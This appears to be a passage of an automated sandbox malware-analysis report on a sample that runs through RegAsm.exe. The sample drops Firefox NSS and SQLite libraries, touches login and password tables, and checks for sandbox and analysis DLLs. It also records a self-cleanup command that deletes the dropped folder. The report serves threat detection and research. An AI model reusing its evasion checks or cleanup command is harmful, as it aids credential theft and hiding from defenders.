              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
              Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr, nss3[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
              Source: GHJDBA.2.dr, FHDAFI.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
              Source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
              Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exitJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dlnashext.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wpdshext.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
              Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
              Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
              Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
              Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.2476833209.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
              Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
              Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.2472331354.00000000191E8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00417645
              Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
              Source: freebl3[1].dll.2.drStatic PE information: section name: .00cfg
              Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
              Source: mozglue[1].dll.2.drStatic PE information: section name: .00cfg
              Source: sqls[1].dll.2.drStatic PE information: section name: .00cfg
              Source: msvcp140.dll.2.drStatic PE information: section name: .didat
              Source: msvcp140[1].dll.2.drStatic PE information: section name: .didat
              Source: nss3.dll.2.drStatic PE information: section name: .00cfg
              Source: nss3[1].dll.2.drStatic PE information: section name: .00cfg
              Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
              Source: softokn3[1].dll.2.drStatic PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134964 push ecx; ret 0_2_00134977
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004191D5 push ecx; ret 2_2_004191E8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC6B536 push ecx; ret 2_2_6CC6B549
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqls[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\vcruntime140.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\mozglue.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\nss3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\msvcp140.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\softokn3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\freebl3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\vcruntime140.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\mozglue.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\nss3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\msvcp140.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\softokn3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DBFCBGCGIJKJ\freebl3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00417645
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5768, type: MEMORYSTR
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
              Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
              Source: RegAsm.exeBinary or memory string: API_LOG.DLL
              Source: RegAsm.exe, 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqls[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\DBFCBGCGIJKJ\nss3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\DBFCBGCGIJKJ\softokn3.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\DBFCBGCGIJKJ\freebl3.dllJump to dropped file
